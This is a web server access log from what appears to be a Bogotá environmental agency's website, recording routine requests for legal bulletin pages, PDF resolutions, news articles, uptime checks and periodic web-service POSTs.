172.22.2.4 - - [26/Aug/2023:15:33:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50790
172.22.2.4 - - [26/Aug/2023:15:33:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [26/Aug/2023:15:35:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41818
172.22.2.4 - - [26/Aug/2023:15:34:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53362
172.22.2.4 - - [26/Aug/2023:15:36:56 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
216.245.221.92 - - [26/Aug/2023:15:37:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [26/Aug/2023:15:38:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43020
201.245.192.253 - - [26/Aug/2023:15:38:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43801
201.245.192.253 - - [26/Aug/2023:15:40:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41818
172.22.2.4 - - [26/Aug/2023:15:39:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [26/Aug/2023:15:39:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57790
172.22.2.4 - - [26/Aug/2023:15:41:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
216.245.221.92 - - [26/Aug/2023:15:42:16 -0500] "HEAD / HTTP/1.1" 200 -
186.84.89.201 - - [26/Aug/2023:15:43:35 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.84.89.201 - - [26/Aug/2023:15:43:35 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.84.89.201 - - [26/Aug/2023:15:43:35 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
172.22.2.4 - - [26/Aug/2023:15:43:55 -0500] "GET /BLA/boletinlegal/Directivas/2018/Directiva%20No.%2027%20del%2028%20de%20diciembre%20de%202018.pdf HTTP/1.1" 200 2831879
216.244.66.246 - - [26/Aug/2023:15:44:12 -0500] "GET /se-abre-convocatoria-a-organizaciones-ambientales-para-generar-1-070-empleos-verdes-dirigidos-a-mujeres.html HTTP/1.1" 200 1128
201.245.192.253 - - [26/Aug/2023:15:45:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41818
172.22.2.4 - - [26/Aug/2023:15:45:50 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%2010%20del%2021%20de%20Septiembre%20de%202018.pdf HTTP/1.1" 200 163426
172.22.2.4 - - [26/Aug/2023:15:44:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [26/Aug/2023:15:47:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [26/Aug/2023:15:45:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59343
66.249.70.5 - - [26/Aug/2023:15:47:39 -0500] "GET /BLA/resoluciones/Autos%202008/1657.pdf HTTP/1.1" 200 320589
181.78.24.210 - - [26/Aug/2023:15:47:50 -0500] "GET /secretaria-de-ambiente-abre-convocatoria-para-el-proceso-de-formacion-mujeres-cuidadoras-de-humedales.html HTTP/1.1" 304 -
201.245.192.253 - - [26/Aug/2023:15:50:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41818
181.48.255.197 - - [26/Aug/2023:15:50:10 -0500] "GET /inscribete-y-participa-en-la-convencion-internacional-de-emergencia-climatica-bogota-2023.html HTTP/1.1" 200 895
216.245.221.92 - - [26/Aug/2023:15:52:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [26/Aug/2023:15:50:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [26/Aug/2023:15:51:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53013
172.22.2.4 - - [26/Aug/2023:15:53:50 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
172.22.2.4 - - [26/Aug/2023:15:53:52 -0500] "GET /BLA/boletinlegal/Circulares/2023/CIRCULAR%20No.%2000005%20DEL%2013%20DE%20JUNIO%20DEL%202023.pdf HTTP/1.1" 200 3638854
66.249.70.7 - - [26/Aug/2023:15:53:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5767.pdf HTTP/1.1" 200 715997
201.245.192.253 - - [26/Aug/2023:15:55:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41818
40.77.167.235 - - [26/Aug/2023:15:56:21 -0500] "GET /Publicaciones/2023EE94691.pdf HTTP/1.1" 404 227
216.245.221.92 - - [26/Aug/2023:15:57:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [26/Aug/2023:15:56:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.246 - - [26/Aug/2023:15:58:27 -0500] "GET /tasa-retributiva-por-vertimientos-puntuales-al-agua-hasta-el-10-de-febrero-hay-plazo-para-diligenciar-y-enviar-formulario-de-autodeclaracion.html HTTP/1.1" 200 1030
172.22.2.4 - - [26/Aug/2023:15:57:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58187
201.245.192.253 - - [26/Aug/2023:16:00:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41818
216.245.221.92 - - [26/Aug/2023:16:02:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [26/Aug/2023:16:02:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [26/Aug/2023:16:03:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53013
201.245.192.253 - - [26/Aug/2023:16:05:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41818
152.203.202.214 - - [26/Aug/2023:16:06:07 -0500] "GET /secretaria-de-ambiente-suspende-actividades-de-industria-que-operaba-en-usme-sin-permisos-ambientales.html?fbclid=IwAR31-ABO7yErpMOUIdqnksxKSgnLKbQPurzj3Igzgx-LpnF61S03gBnWHIk HTTP/1.1" 200 864
216.245.221.92 - - [26/Aug/2023:16:07:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [26/Aug/2023:16:09:10 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [26/Aug/2023:16:09:10 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [26/Aug/2023:16:09:10 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [26/Aug/2023:16:09:10 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [26/Aug/2023:16:09:10 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [26/Aug/2023:16:09:10 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [26/Aug/2023:16:09:10 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [26/Aug/2023:16:09:10 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [26/Aug/2023:16:09:10 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [26/Aug/2023:16:09:10 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [26/Aug/2023:16:09:10 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [26/Aug/2023:16:09:10 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [26/Aug/2023:16:09:10 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [26/Aug/2023:16:09:10 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [26/Aug/2023:16:09:10 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [26/Aug/2023:16:09:10 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [26/Aug/2023:16:09:10 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [26/Aug/2023:16:09:10 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [26/Aug/2023:16:09:10 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [26/Aug/2023:16:08:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [26/Aug/2023:16:09:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [26/Aug/2023:16:10:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41818
172.22.2.4 - - [26/Aug/2023:16:09:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
172.22.2.4 - - [26/Aug/2023:16:09:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53013
69.63.184.4 - - [26/Aug/2023:16:11:50 -0500] "GET /images/reunion-planta-termovalorizacion-11-mayo.jpg HTTP/1.1" 200 34782
216.245.221.92 - - [26/Aug/2023:16:12:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [26/Aug/2023:16:15:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41818
172.22.2.4 - - [26/Aug/2023:16:14:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [26/Aug/2023:16:14:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60342
216.245.221.92 - - [26/Aug/2023:16:17:16 -0500] "HEAD / HTTP/1.1" 200 -
186.84.20.108 - - [26/Aug/2023:16:18:14 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
186.84.20.108 - - [26/Aug/2023:16:18:14 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
186.84.20.108 - - [26/Aug/2023:16:18:14 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
